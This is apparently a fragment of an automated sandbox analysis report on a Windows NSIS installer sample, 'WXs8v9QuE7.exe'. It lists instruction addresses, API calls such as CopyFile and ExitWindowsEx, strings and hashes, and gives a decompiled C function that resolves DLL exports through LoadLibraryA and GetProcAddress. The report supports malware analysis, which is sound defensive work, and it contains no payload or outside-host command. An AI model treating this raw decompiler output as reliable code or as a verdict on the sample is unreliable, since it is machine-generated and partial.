                                                                                                                    0x00403485
                                                                                                                    0x00403487
                                                                                                                    0x00403497
                                                                                                                    0x00403499
                                                                                                                    0x0040349b
                                                                                                                    0x004034a8
                                                                                                                    0x004034b7
                                                                                                                    0x004034bf
                                                                                                                    0x004034c7
                                                                                                                    0x004034c7
                                                                                                                    0x0040349b
                                                                                                                    0x00403487
                                                                                                                    0x00403483
                                                                                                                    0x004034cb
                                                                                                                    0x004034d0
                                                                                                                    0x004034d7
                                                                                                                    0x004034e5
                                                                                                                    0x004034e8
                                                                                                                    0x004034ee
                                                                                                                    0x004034f0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004034d9
                                                                                                                    0x004034df
                                                                                                                    0x004034e1
                                                                                                                    0x004034e3
                                                                                                                    0x004034f2
                                                                                                                    0x004034f4
                                                                                                                    0x00000000
                                                                                                                    0x004034f4
                                                                                                                    0x00000000
                                                                                                                    0x004034e3
                                                                                                                    0x004034d7
                                                                                                                    0x00403350
                                                                                                                    0x00403357
                                                                                                                    0x00403357
                                                                                                                    0x004032d3
                                                                                                                    0x00403322
                                                                                                                    0x00403322
                                                                                                                    0x0040332e
                                                                                                                    0x00000000
                                                                                                                    0x0040332e
                                                                                                                    0x004032dc
                                                                                                                    0x004032e9
                                                                                                                    0x004032e0
                                                                                                                    0x004032e6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004032e8
                                                                                                                    0x004032e8
                                                                                                                    0x004032e8
                                                                                                                    0x004032ed
                                                                                                                    0x004032ef
                                                                                                                    0x004032f7
                                                                                                                    0x00403368
                                                                                                                    0x0040336a
                                                                                                                    0x00403371
                                                                                                                    0x00403379
                                                                                                                    0x00403379
                                                                                                                    0x00403384
                                                                                                                    0x00403389
                                                                                                                    0x00403398
                                                                                                                    0x0040339c
                                                                                                                    0x0040339d
                                                                                                                    0x004033a6
                                                                                                                    0x0040339f
                                                                                                                    0x0040339f
                                                                                                                    0x0040339f
                                                                                                                    0x004033ac
                                                                                                                    0x004033b2
                                                                                                                    0x004033b8
                                                                                                                    0x004033c0
                                                                                                                    0x004033c0
                                                                                                                    0x004033ce
                                                                                                                    0x004033d5
                                                                                                                    0x004033de
                                                                                                                    0x004033e4
                                                                                                                    0x004033f0
                                                                                                                    0x004033f6
                                                                                                                    0x00403400
                                                                                                                    0x0040340a
                                                                                                                    0x00403410
                                                                                                                    0x00403412
                                                                                                                    0x00403414
                                                                                                                    0x00403415
                                                                                                                    0x00403416
                                                                                                                    0x00403427
                                                                                                                    0x0040342d
                                                                                                                    0x00403434
                                                                                                                    0x00403437
                                                                                                                    0x0040343d
                                                                                                                    0x0040343d
                                                                                                                    0x00403434
                                                                                                                    0x00403412
                                                                                                                    0x00403441
                                                                                                                    0x00403447
                                                                                                                    0x00403447
                                                                                                                    0x00403447
                                                                                                                    0x0040344a
                                                                                                                    0x0040344b
                                                                                                                    0x0040344c
                                                                                                                    0x0040344c
                                                                                                                    0x00000000
                                                                                                                    0x00403398
                                                                                                                    0x004032f9
                                                                                                                    0x004032fb
                                                                                                                    0x00403306
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0040330e
                                                                                                                    0x00403319
                                                                                                                    0x0040331e
                                                                                                                    0x00000000
                                                                                                                    0x0040331e
                                                                                                                    0x00403293
                                                                                                                    0x0040329f
                                                                                                                    0x004032a4
                                                                                                                    0x004032a9
                                                                                                                    0x004032ab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00403248
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x004031f8
                                                                                                                    0x004031f8
                                                                                                                    0x004031f8
                                                                                                                    0x004031f9
                                                                                                                    0x004031f9
                                                                                                                    0x00000000
                                                                                                                    0x004031f8
                                                                                                                    0x00000000
                                                                                                                    0x00403149
                                                                                                                    0x0040314a
                                                                                                                    0x00403156
                                                                                                                    0x0040315c
                                                                                                                    0x00000000
                                                                                                                    0x0040315e
                                                                                                                    0x00403160
                                                                                                                    0x00403167
                                                                                                                    0x0040316c
                                                                                                                    0x00403171
                                                                                                                    0x00403178
                                                                                                                    0x0040317e
                                                                                                                    0x00403194
                                                                                                                    0x004031a4
                                                                                                                    0x004031a9
                                                                                                                    0x004031af
                                                                                                                    0x004031b6
                                                                                                                    0x004031c9
                                                                                                                    0x004031ce
                                                                                                                    0x004031d0
                                                                                                                    0x004031d2
                                                                                                                    0x004031d7
                                                                                                                    0x004031d7
                                                                                                                    0x004031e7
                                                                                                                    0x004031ed
                                                                                                                    0x00000000
                                                                                                                    0x004031ed

                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE ref: 00403121
                                                                                                                    • GetVersion.KERNEL32 ref: 00403127
                                                                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403150
                                                                                                                    • #17.COMCTL32(0000000B,0000000D), ref: 00403171
                                                                                                                    • OleInitialize.OLE32(00000000), ref: 00403178
                                                                                                                    • SHGetFileInfoA.SHELL32(0041F4F0,00000000,?,00000160,00000000), ref: 00403194
                                                                                                                    • GetCommandLineA.KERNEL32(00423740,NSIS Error), ref: 004031A9
                                                                                                                    • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000), ref: 004031BC
                                                                                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00409168), ref: 004031E7
                                                                                                                    • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040327E
                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403293
                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040329F
                                                                                                                    • DeleteFileA.KERNELBASE(1033), ref: 004032B6
                                                                                                                      • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                                                                                      • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?), ref: 00405F55
                                                                                                                    • OleUninitialize.OLE32(00000020), ref: 00403337
                                                                                                                    • ExitProcess.KERNEL32 ref: 00403357
                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000,00000020), ref: 0040336A
                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000,00000020), ref: 00403379
                                                                                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000,00000020), ref: 00403384
                                                                                                                    • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\WXs8v9QuE7.exe" ,00000000,00000020), ref: 00403390
                                                                                                                    • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                                                                                    • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                                                                                    • CopyFileA.KERNEL32(C:\Users\user\Desktop\WXs8v9QuE7.exe,0041F0F0,00000001), ref: 0040340A
                                                                                                                    • CloseHandle.KERNEL32(00000000,0041F0F0,0041F0F0,?,0041F0F0,00000000), ref: 00403437
                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                                                                                    • ExitWindowsEx.USER32 ref: 004034E8
                                                                                                                    • ExitProcess.KERNEL32 ref: 0040350B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                                                                                    • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\WXs8v9QuE7.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WXs8v9QuE7.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$~nsu
                                                                                                                    • API String ID: 3469842172-736306134
                                                                                                                    • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                                                                    • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                                                                                    • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                                                                                    • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001D3B, Relevance: 21.5, APIs: 14, Instructions: 499stringlibraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E10001D3B() {
				void* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				CHAR* _v44;
				intOrPtr _v48;
				void* _v52;
				CHAR* _t180;
				void* _t182;
				signed int _t183;
				void* _t186;
				void* _t188;
				CHAR* _t190;
				void* _t198;
				struct HINSTANCE__* _t199;
				_Unknown_base(*)()* _t200;
				_Unknown_base(*)()* _t202;
				struct HINSTANCE__* _t203;
				void* _t205;
				char* _t206;
				_Unknown_base(*)()* _t207;
				void* _t218;
				signed char _t219;
				void* _t224;
				struct HINSTANCE__* _t226;
				void* _t227;
				void* _t228;
				void* _t232;
				void* _t235;
				void* _t237;
				void* _t244;
				void* _t245;
				void* _t248;
				struct HINSTANCE__* _t253;
				CHAR* _t254;
				signed char _t257;
				void _t258;
				void* _t259;
				void* _t266;
				void* _t267;
				void* _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t279;
				signed char _t282;
				signed int _t283;
				CHAR* _t284;
				CHAR* _t286;
				struct HINSTANCE__* _t288;
				void* _t290;
				void* _t291;

				_t253 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v12 = 0;
				_v40 = 0;
				_t291 = 0;
				_t180 = E10001541();
				_v24 = _t180;
				_v28 = _t180;
				_v44 = E10001541();
				_t182 = E10001561();
				_v52 = _t182;
				_v8 = _t182;
				while(1) {
					_t183 = _v32;
					_t283 = 3;
					_v48 = _t183;
					if(_t183 != _t253 && _t291 == _t253) {
						break;
					}
					_t282 =  *_v8;
					_t257 = _t282;
					_t186 = _t257 - _t253;
					if(_t186 == 0) {
						_t29 =  &_v32;
						 *_t29 = _v32 | 0xffffffff;
						__eflags =  *_t29;
						L13:
						_t188 = _v48 - _t253;
						if(_t188 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t291 - _t253;
							if(_t291 == _t253) {
								_t224 = GlobalAlloc(0x40, 0x14a4); // executed
								_t291 = _t224;
								 *(_t291 + 0x810) = _t253;
								 *(_t291 + 0x814) = _t253;
							}
							_t258 = _v36;
							_t39 = _t291 + 8; // 0x8
							_t190 = _t39;
							_t40 = _t291 + 0x408; // 0x408
							_t284 = _t40;
							 *_t291 = _t258;
							 *_t190 =  *_t190 & 0x00000000;
							 *(_t291 + 0x808) = _t253;
							 *_t284 =  *_t284 & 0x00000000;
							_t259 = _t258 - _t253;
							__eflags = _t259;
							 *(_t291 + 0x80c) = _t253;
							 *(_t291 + 4) = _t253;
							if(_t259 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L56;
								}
								_t290 = 0;
								GlobalFree(_t291);
								_t291 = E10001641(_v24);
								__eflags = _t291 - _t253;
								if(_t291 == _t253) {
									goto L56;
								} else {
									goto L28;
								}
								while(1) {
									L28:
									_t218 =  *(_t291 + 0x14a0);
									__eflags = _t218 - _t253;
									if(_t218 == _t253) {
										break;
									}
									_t290 = _t291;
									_t291 = _t218;
									__eflags = _t291 - _t253;
									if(_t291 != _t253) {
										continue;
									}
									break;
								}
								__eflags = _t290 - _t253;
								if(_t290 != _t253) {
									 *(_t290 + 0x14a0) = _t253;
								}
								_t219 =  *(_t291 + 0x810);
								__eflags = _t219 & 0x00000008;
								if((_t219 & 0x00000008) == 0) {
									 *(_t291 + 0x810) = _t219 | 0x00000002;
								} else {
									_t291 = E1000187C(_t291);
									 *(_t291 + 0x810) =  *(_t291 + 0x810) & 0xfffffff5;
								}
								goto L56;
							} else {
								_t266 = _t259 - 1;
								__eflags = _t266;
								if(_t266 == 0) {
									L24:
									lstrcpyA(_t190, _v44);
									L25:
									lstrcpyA(_t284, _v24);
									L56:
									_v28 = _v24;
									L57:
									_v8 = _v8 + 1;
									if(_v32 != 0xffffffff) {
										continue;
									}
									break;
								}
								_t267 = _t266 - 1;
								__eflags = _t267;
								if(_t267 == 0) {
									goto L25;
								}
								__eflags = _t267 != 1;
								if(_t267 != 1) {
									goto L56;
								}
								goto L24;
							}
						}
						if(_t188 == 1) {
							_t226 = _v16;
							if(_v40 == _t253) {
								_t226 = _t226 - 1;
							}
							 *(_t291 + 0x814) = _t226;
						}
						goto L56;
					}
					_t227 = _t186 - 0x23;
					if(_t227 == 0) {
						_v32 = _t253;
						_v36 = _t253;
						goto L13;
					}
					_t228 = _t227 - 5;
					if(_t228 == 0) {
						__eflags = _v36 - _t283;
						_v32 = 1;
						_v12 = _t253;
						_v20 = _t253;
						_v16 = (0 | _v36 == _t283) + 1;
						_v40 = _t253;
						goto L13;
					}
					_t232 = _t228 - 1;
					if(_t232 == 0) {
						_v32 = 2;
						_v12 = _t253;
						_v20 = _t253;
						goto L13;
					}
					if(_t232 != 0x16) {
						_t235 = _v32 - _t253;
						__eflags = _t235;
						if(_t235 == 0) {
							__eflags = _t282 - 0x2a;
							if(_t282 == 0x2a) {
								_v36 = 2;
								L55:
								_t253 = 0;
								__eflags = 0;
								goto L56;
							}
							__eflags = _t282 - 0x2d;
							if(_t282 == 0x2d) {
								L124:
								_t237 = _v8 + 1;
								__eflags =  *_t237 - 0x3e;
								if( *_t237 != 0x3e) {
									L126:
									_t237 = _v8 + 1;
									__eflags =  *_t237 - 0x3a;
									if( *_t237 != 0x3a) {
										L133:
										_v28 =  &(_v28[1]);
										 *_v28 = _t282;
										goto L57;
									}
									__eflags = _t282 - 0x2d;
									if(_t282 == 0x2d) {
										goto L133;
									}
									_v36 = 1;
									L129:
									_v8 = _t237;
									__eflags = _v28 - _v24;
									if(_v28 <= _v24) {
										 *_v44 =  *_v44 & 0x00000000;
									} else {
										 *_v28 =  *_v28 & 0x00000000;
										lstrcpyA(_v44, _v24);
									}
									goto L55;
								}
								_v36 = _t283;
								goto L129;
							}
							__eflags = _t282 - 0x3a;
							if(_t282 != 0x3a) {
								goto L133;
							}
							__eflags = _t282 - 0x2d;
							if(_t282 != 0x2d) {
								goto L126;
							}
							goto L124;
						}
						_t244 = _t235 - 1;
						__eflags = _t244;
						if(_t244 == 0) {
							L68:
							_t245 = _t257 - 0x22;
							__eflags = _t245 - 0x55;
							if(_t245 > 0x55) {
								goto L55;
							}
							switch( *((intOrPtr*)(( *(_t245 + 0x100023a0) & 0x000000ff) * 4 +  &M10002344))) {
								case 0:
									__eax = _v24;
									__edi = _v8;
									while(1) {
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										__eflags = __cl - __dl;
										if(__cl != __dl) {
											goto L108;
										}
										L107:
										__eflags =  *(__edi + 1) - __dl;
										if( *(__edi + 1) != __dl) {
											L112:
											 *__eax =  *__eax & 0x00000000;
											__ebx = E10001550(_v24);
											goto L84;
										}
										L108:
										__eflags = __cl;
										if(__cl == 0) {
											goto L112;
										}
										__eflags = __cl - __dl;
										if(__cl == __dl) {
											__edi = __edi + 1;
											__eflags = __edi;
										}
										__cl =  *__edi;
										 *__eax =  *__edi;
										__eax = __eax + 1;
										__edi = __edi + 1;
										_v8 = __edi;
										__cl =  *__edi;
										__eflags = __cl - __dl;
										if(__cl != __dl) {
											goto L108;
										}
										goto L107;
									}
								case 1:
									_v12 = 1;
									goto L55;
								case 2:
									_v12 = _v12 | 0xffffffff;
									goto L55;
								case 3:
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v16 = _v16 + 1;
									goto L73;
								case 4:
									__eflags = _v20;
									if(_v20 != 0) {
										goto L55;
									}
									_v8 = _v8 - 1;
									__ebx = E10001541();
									 &_v8 = E10001CD9( &_v8);
									__eax = E1000176C(__edx, __eax, __edx, __ebx);
									goto L84;
								case 5:
									L92:
									_v20 = _v20 + 1;
									goto L55;
								case 6:
									_push(0x19);
									goto L119;
								case 7:
									_push(0x15);
									goto L119;
								case 8:
									_push(0x16);
									goto L119;
								case 9:
									_push(0x18);
									goto L119;
								case 0xa:
									_push(5);
									goto L99;
								case 0xb:
									__eax = 0;
									__eax = 1;
									goto L78;
								case 0xc:
									_push(6);
									goto L99;
								case 0xd:
									_push(2);
									goto L99;
								case 0xe:
									_push(3);
									goto L99;
								case 0xf:
									_push(0x17);
									L119:
									_pop(__ebx);
									goto L85;
								case 0x10:
									__eax =  &_v8;
									__eax = E10001CD9( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									__eflags = __ebx - 0xb;
									if(__ebx < 0xb) {
										__ebx = __ebx + 0xa;
									}
									goto L84;
								case 0x11:
									__ebx = 0xffffffff;
									goto L85;
								case 0x12:
									__eax = 0;
									__eflags = 0;
									goto L78;
								case 0x13:
									_push(4);
									L99:
									_pop(__eax);
									L78:
									__edx = _v16;
									__ecx = 0;
									__edx = _v16 << 5;
									__ecx = 1;
									__eflags = _v12 - 0xffffffff;
									__edi = (_v16 << 5) + __esi;
									_v40 = 1;
									 *(__edi + 0x818) = __eax;
									if(_v12 == 0xffffffff) {
										L80:
										__eax = __ecx;
										L81:
										__eflags = _v12 - __ecx;
										 *(__edi + 0x828) = __eax;
										if(_v12 == __ecx) {
											__eax =  &_v8;
											__eax = E10001CD9( &_v8);
											__eax = __eax + 1;
											__eflags = __eax;
											_v12 = __eax;
										}
										__eax = _v12;
										 *((intOrPtr*)(__edi + 0x81c)) = _v12;
										_t126 = _v16 + 0x41; // 0x41
										_t126 = _t126 << 5;
										__eax = 0;
										__eflags = 0;
										 *((intOrPtr*)((_t126 << 5) + __esi)) = 0;
										 *((intOrPtr*)(__edi + 0x82c)) = 0;
										 *((intOrPtr*)(__edi + 0x830)) = 0;
										goto L84;
									}
									__eax =  *(0x10003058 + __eax * 4);
									__eflags = __eax;
									if(__eax > 0) {
										goto L81;
									}
									goto L80;
								case 0x14:
									_t247 =  *(_t291 + 0x814);
									__eflags = _t247 - _v16;
									if(_t247 > _v16) {
										_v16 = _t247;
									}
									_v12 = _v12 & 0x00000000;
									_v20 = _v20 & 0x00000000;
									_v36 - 3 = _t247 - (_v36 == 3);
									if(_t247 != _v36 == 3) {
										L73:
										_v40 = 1;
									}
									goto L55;
								case 0x15:
									__eax =  &_v8;
									__eax = E10001CD9( &_v8);
									__ebx = __eax;
									__ebx = __eax + 1;
									L84:
									__eflags = __ebx;
									if(__ebx == 0) {
										goto L55;
									}
									L85:
									__eflags = _v20;
									_v40 = 1;
									if(_v20 != 0) {
										L90:
										__eflags = _v20 - 1;
										if(_v20 == 1) {
											__eax = _v16;
											__eax = _v16 << 5;
											__eflags = __eax;
											 *(__eax + __esi + 0x830) = __ebx;
										}
										goto L92;
									}
									_v16 = _v16 << 5;
									_t134 = __esi + 0x82c; // 0x82c
									__edi = (_v16 << 5) + _t134;
									__eax =  *__edi;
									__eflags = __eax - 0xffffffff;
									if(__eax <= 0xffffffff) {
										L88:
										__eax = GlobalFree(__eax);
										L89:
										 *__edi = __ebx;
										goto L90;
									}
									__eflags = __eax - 0x19;
									if(__eax <= 0x19) {
										goto L89;
									}
									goto L88;
								case 0x16:
									goto L55;
							}
						}
						_t248 = _t244 - 1;
						__eflags = _t248;
						if(_t248 == 0) {
							_v16 = _t253;
							goto L68;
						}
						__eflags = _t248 != 1;
						if(_t248 != 1) {
							goto L133;
						}
						_t271 = _t257 - 0x21;
						__eflags = _t271;
						if(_t271 == 0) {
							_v12 =  ~_v12;
							goto L55;
						}
						_t272 = _t271 - 0x42;
						__eflags = _t272;
						if(_t272 == 0) {
							L51:
							__eflags = _v12 - 1;
							if(_v12 != 1) {
								_t84 = _t291 + 0x810;
								 *_t84 =  *(_t291 + 0x810) &  !0x00000001;
								__eflags =  *_t84;
							} else {
								 *(_t291 + 0x810) =  *(_t291 + 0x810) | 1;
							}
							_v12 = 1;
							goto L55;
						}
						_t276 = _t272;
						__eflags = _t276;
						if(_t276 == 0) {
							_push(0x20);
							L50:
							_pop(1);
							goto L51;
						}
						_t277 = _t276 - 9;
						__eflags = _t277;
						if(_t277 == 0) {
							_push(8);
							goto L50;
						}
						_push(4);
						_pop(1);
						_t278 = _t277 - 1;
						__eflags = _t278;
						if(_t278 == 0) {
							goto L51;
						}
						_t279 = _t278 - 1;
						__eflags = _t279;
						if(_t279 == 0) {
							_push(0x10);
							goto L50;
						}
						__eflags = _t279 != 0;
						if(_t279 != 0) {
							goto L55;
						}
						_push(0x40);
						goto L50;
					} else {
						_v32 = _t283;
						_v12 = 1;
						goto L13;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t291 == _t253 ||  *(_t291 + 0x80c) != _t253) {
					L145:
					return _t291;
				} else {
					_t198 =  *_t291 - 1;
					if(_t198 == 0) {
						_t169 = _t291 + 8; // 0x8
						_t286 = _t169;
						__eflags =  *_t286;
						if( *_t286 != 0) {
							_t199 = GetModuleHandleA(_t286);
							__eflags = _t199 - _t253;
							 *(_t291 + 0x808) = _t199;
							if(_t199 != _t253) {
								L141:
								_t173 = _t291 + 0x408; // 0x408
								_t254 = _t173;
								_t200 = GetProcAddress( *(_t291 + 0x808), _t254);
								__eflags = _t200;
								 *(_t291 + 0x80c) = _t200;
								if(_t200 != 0) {
									goto L145;
								}
								lstrcatA(_t254, 0x10004024);
								_t202 = GetProcAddress( *(_t291 + 0x808), _t254);
								__eflags = _t202;
								L143:
								 *(_t291 + 0x80c) = _t202;
								if(__eflags != 0) {
									goto L145;
								}
								L144:
								_t178 = _t291 + 4;
								 *_t178 =  *(_t291 + 4) | 0xffffffff;
								__eflags =  *_t178;
								goto L145;
							}
							_t203 = LoadLibraryA(_t286);
							__eflags = _t203 - _t253;
							 *(_t291 + 0x808) = _t203;
							if(_t203 == _t253) {
								goto L144;
							}
							goto L141;
						}
						_t170 = _t291 + 0x408; // 0x408
						_t202 = E10001641(_t170);
						__eflags = _t202 - _t253;
						goto L143;
					}
					_t205 = _t198 - 1;
					if(_t205 == 0) {
						_t167 = _t291 + 0x408; // 0x408
						_t206 = _t167;
						__eflags =  *_t206;
						if( *_t206 == 0) {
							goto L145;
						}
						_t207 = E10001641(_t206);
						L136:
						 *(_t291 + 0x80c) = _t207;
						goto L145;
					}
					if(_t205 != 1) {
						goto L145;
					}
					_t72 = _t291 + 8; // 0x8
					_t255 = _t72;
					_t288 = E10001641(_t72);
					 *(_t291 + 0x808) = _t288;
					if(_t288 == 0) {
						goto L144;
					}
					 *(_t291 + 0x850) =  *(_t291 + 0x850) & 0x00000000;
					 *((intOrPtr*)(_t291 + 0x84c)) = E10001550(_t255);
					 *(_t291 + 0x83c) =  *(_t291 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t291 + 0x848)) = 1;
					 *((intOrPtr*)(_t291 + 0x838)) = 1;
					_t81 = _t291 + 0x408; // 0x408
					_t207 =  *(_t288->i + E10001641(_t81) * 4);
					goto L136;
				}
			}





























































                                                                                                                    0x10001d43
                                                                                                                    0x10001d46
                                                                                                                    0x10001d49
                                                                                                                    0x10001d4c
                                                                                                                    0x10001d4f
                                                                                                                    0x10001d52
                                                                                                                    0x10001d55
                                                                                                                    0x10001d57
                                                                                                                    0x10001d5c
                                                                                                                    0x10001d5f
                                                                                                                    0x10001d67
                                                                                                                    0x10001d6a
                                                                                                                    0x10001d6f
                                                                                                                    0x10001d72
                                                                                                                    0x10001d75
                                                                                                                    0x10001d75
                                                                                                                    0x10001d7c
                                                                                                                    0x10001d7d
                                                                                                                    0x10001d80
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001d8d
                                                                                                                    0x10001d8f
                                                                                                                    0x10001d94
                                                                                                                    0x10001d96
                                                                                                                    0x10001def
                                                                                                                    0x10001def
                                                                                                                    0x10001def
                                                                                                                    0x10001df3
                                                                                                                    0x10001df6
                                                                                                                    0x10001df8
                                                                                                                    0x10001e1a
                                                                                                                    0x10001e1d
                                                                                                                    0x10001e1f
                                                                                                                    0x10001e28
                                                                                                                    0x10001e2e
                                                                                                                    0x10001e30
                                                                                                                    0x10001e36
                                                                                                                    0x10001e36
                                                                                                                    0x10001e3c
                                                                                                                    0x10001e3f
                                                                                                                    0x10001e3f
                                                                                                                    0x10001e42
                                                                                                                    0x10001e42
                                                                                                                    0x10001e48
                                                                                                                    0x10001e4a
                                                                                                                    0x10001e4d
                                                                                                                    0x10001e53
                                                                                                                    0x10001e56
                                                                                                                    0x10001e56
                                                                                                                    0x10001e58
                                                                                                                    0x10001e5e
                                                                                                                    0x10001e61
                                                                                                                    0x10001e8c
                                                                                                                    0x10001e8f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001e96
                                                                                                                    0x10001e98
                                                                                                                    0x10001ea6
                                                                                                                    0x10001ea9
                                                                                                                    0x10001eab
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001eb1
                                                                                                                    0x10001eb1
                                                                                                                    0x10001eb1
                                                                                                                    0x10001eb7
                                                                                                                    0x10001eb9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001ebb
                                                                                                                    0x10001ebd
                                                                                                                    0x10001ebf
                                                                                                                    0x10001ec1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001ec1
                                                                                                                    0x10001ec3
                                                                                                                    0x10001ec5
                                                                                                                    0x10001ec7
                                                                                                                    0x10001ec7
                                                                                                                    0x10001ecd
                                                                                                                    0x10001ed3
                                                                                                                    0x10001ed5
                                                                                                                    0x10001eeb
                                                                                                                    0x10001ed7
                                                                                                                    0x10001edd
                                                                                                                    0x10001ee0
                                                                                                                    0x10001ee0
                                                                                                                    0x00000000
                                                                                                                    0x10001e63
                                                                                                                    0x10001e63
                                                                                                                    0x10001e63
                                                                                                                    0x10001e64
                                                                                                                    0x10001e70
                                                                                                                    0x10001e74
                                                                                                                    0x10001e7a
                                                                                                                    0x10001e7e
                                                                                                                    0x10001f64
                                                                                                                    0x10001f67
                                                                                                                    0x10001f6a
                                                                                                                    0x10001f6a
                                                                                                                    0x10001f71
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001f71
                                                                                                                    0x10001e66
                                                                                                                    0x10001e66
                                                                                                                    0x10001e67
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001e69
                                                                                                                    0x10001e6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001e6a
                                                                                                                    0x10001e61
                                                                                                                    0x10001dfb
                                                                                                                    0x10001e04
                                                                                                                    0x10001e07
                                                                                                                    0x10001e14
                                                                                                                    0x10001e14
                                                                                                                    0x10001e09
                                                                                                                    0x10001e09
                                                                                                                    0x00000000
                                                                                                                    0x10001dfb
                                                                                                                    0x10001d98
                                                                                                                    0x10001d9b
                                                                                                                    0x10001de7
                                                                                                                    0x10001dea
                                                                                                                    0x00000000
                                                                                                                    0x10001dea
                                                                                                                    0x10001d9d
                                                                                                                    0x10001da0
                                                                                                                    0x10001dcb
                                                                                                                    0x10001dce
                                                                                                                    0x10001dd5
                                                                                                                    0x10001ddc
                                                                                                                    0x10001ddf
                                                                                                                    0x10001de2
                                                                                                                    0x00000000
                                                                                                                    0x10001de2
                                                                                                                    0x10001da2
                                                                                                                    0x10001da3
                                                                                                                    0x10001dba
                                                                                                                    0x10001dc1
                                                                                                                    0x10001dc4
